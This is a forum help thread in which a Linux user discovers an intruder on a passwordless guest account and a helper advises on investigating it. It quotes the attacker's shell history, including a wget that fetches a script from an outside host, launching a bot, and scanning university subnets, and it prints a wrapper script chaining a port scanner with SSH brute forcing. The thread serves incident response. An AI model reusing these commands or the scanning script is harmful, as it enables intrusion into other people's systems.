Pscan2

[Lunar_Lamp]

[edit: I am now confident someone is trying to hack me AS I TYPE]

I was sitting on my laptop and noticed that the CPU usage suddenly went up to 100%

I typed in "top" to see what was sucking my CPU, as I didn't think I was doing anything intensive, and Pscan2 was listed as sucking ~95% of my CPU cycles. I thought this strange and hadn't heard of the process, and it didn't have a man page. Close examination revealed that the user running it was "guest". Even more intriguing. I had forgotten that I set up a guest account a few months back, with no password, for when I was on holiday so people could transfer photos from their digital cameras onto my laptop easily.

I used sudo to kill the process as I didn't have any knowledge of what it was doing nor why. A google search on pscan2 seems to suggest it is a C program that port scans the host's computer.

Is it possible that someone had gained access to my guest account remotely and was attempting to port scan me? I really have no idea what was going on, but figured a "kill and wait" was a decent idea.

Hmmm, now I am getting the guest account running "ssh-scan". How do I trace this, as it cannot be good.

[tuxinvader]

I would leave the app running, but pull the lan cable out.

Check the last log run "last | less" in a terminal and look for the guest account and where it logged on from.

you should also check the .bash_history file in the guest account home directory.

[tuxinvader]

you can't really trust the system anymore. For investigation you might be better off shutting it down (preferably hard) run sync three times in a terminal and then hit the reset button / pull the battery out.

Then boot of a liveCD and mount the partitions. You need to this so you know ls and find etc haven't been root kitted.

[Lunar_Lamp]

Well, I killed the processes a few times:

When I did "sudo killall ssh-scan" a pscan2 reappeared, which I killed and then rebooted. I have changed the guest account password, and removed it from all access-groups.


last | less from today:

ed :0 Fri Sep 8 13:11 still logged in
guest :0 Fri Sep 8 13:10 - 13:11 (00:01)
reboot system boot 2.6.15-26-k7 Fri Sep 8 13:09 (00:09)
guest pts/0 86.121.100.83 Fri Sep 8 12:35 - down (00:32)
guest pts/0 204.249.177.66 Fri Sep 8 12:33 - 12:35 (00:01)
ed :0 Fri Sep 8 09:09 - down (03:5
reboot system boot 2.6.15-26-k7 Fri Sep 8 09:08 (03:59)

[Lunar_Lamp]

Ok, checking out what he was doing (I'm not sure, but I think some of the old ones may be me, but everything after and including the "ps -x" was NOT me or a guest I don't think). Is tehre a way to check timestamps on this?

Code:

sudo apt-get update
exit
fglrxinfo 
exit
sudo nano /boot/grub/menu.lst
fglrxinfo 
reboot
sudo reboot
exit
w
hostname
ps -x
hostname -f
last -20
passwd
uname -a
uname -r
ls
cat /etc/issue
uname -a
w
cat /proc/cpuinfo
ls
cd /var/tmp
ls
cd /tm
cd /tmp
ls
cd /var/tmp
mkdir .a
cd .a
ls
wget http://b3ngos.home.ro/udp.pl
ps axl
passwd ed
last -20
tar xzvf bot.tgz
cd edu
./mech
ps axl
cd ..
tar xzvf list.jpg
cd list
./a 128.105;./a 120.201;./a 128.204;./a 128.205;./a 128.139

[tuxinvader]

You really should boot of a live CD. You can't analyse your system unless you know you can trust the binaries you are using. The guest account has logged in from a couple of addresses today already, you have been cracked and you can't trust your system anymore. You must boot off of a live cd and then start inspecting init, the kernel, etc to find out what they did.

Bet you wont leave a password less login on your syste again

whois 86.121.100.83

inetnum: 86.121.100.0 - 86.121.100.255
netname: RO-RDS-CABLELINK
descr: Romania Data Systems
descr: Cablelink Customers - Bucharest
country: RO

I can help you go through it if you like on irc or msn?

[tuxinvader]

so you have a list.jpg file on your system that isn't a picture, but a tar file. It contains some app they compiled on another system. ./a is the application, those numbers could be subnets? Perhaps scanning for other hosts? It's possible this is a worm of some kind. Do you have any antivirus?

[tuxinvader]

whois 128.105.0.0

OrgName: University of Wisconsin-Madison
OrgID: UNIVER-17
Address: Computer Systems Lab

whois 120.201.0.0
Unknown AS number or IP network. Please upgrade this program.

whois 128.204.0.0
No match found for 128.204.0.0.

whois 128.205.0.0

OrgName: State University of New York at Buffalo
OrgID: SUNYAB-2
Address: 305 Computing Center

whois 128.139.0.0
inetnum: 128.139.0.0 - 128.139.31.255
netname: HUJI-128-NET
descr: Hebrew University of Jerusalem
country: IL

[Lunar_Lamp]

Code:

clamdscan /var/tmp/list.jpg 
/var/tmp/list.jpg: Linux.RST.B-1 FOUND

----------- SCAN SUMMARY -----------
Infected files: 1
Time: 0.564 sec (0 m 0 s)

It has been extracted as a folder in there called list. One of the files is a list of user/pass combos, mine not included thankfully.

[Lunar_Lamp]

the program "a" is this:

Code:

#!/bin/bash
if [ $# != 1 ]; then
        echo " usage: $0 <b class>"
        exit;
fi


echo "### Super Sonic Scaner Build by BengoS  ###"
echo "### Lets ride baby"
echo "### I Love U Cristina"
./pscan2 $1 22 

sleep 10
cat $1.pscan.22 |sort |uniq > mfu.txt
oopsnr2=`grep -c . mfu.txt`
echo "# done"
echo "# founded  $oopsnr2 ips"
echo "----------------------------------------"
echo "# Lets Start the checking !"
./ssh-scan 100
rm -rf $1.pscan.22 mfu.txt
echo "thats all , go 1 more time;)"

So it's just a shell script to run pscan2 basically. pscan2 can be found here I think:
http://www.phreak.org/archives/explo...nners/pscan2.c